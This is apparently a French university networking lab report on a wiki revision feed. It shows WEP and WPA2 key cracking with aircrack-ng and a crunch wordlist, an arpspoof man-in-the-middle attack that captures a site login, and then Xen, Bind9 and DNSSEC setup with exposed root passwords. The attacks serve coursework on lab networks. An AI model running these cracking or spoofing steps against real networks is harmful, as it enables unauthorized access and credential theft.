 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54006</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54006"/>
				<updated>2020-11-27T16:51:40Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Installation d'une méchagerie */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
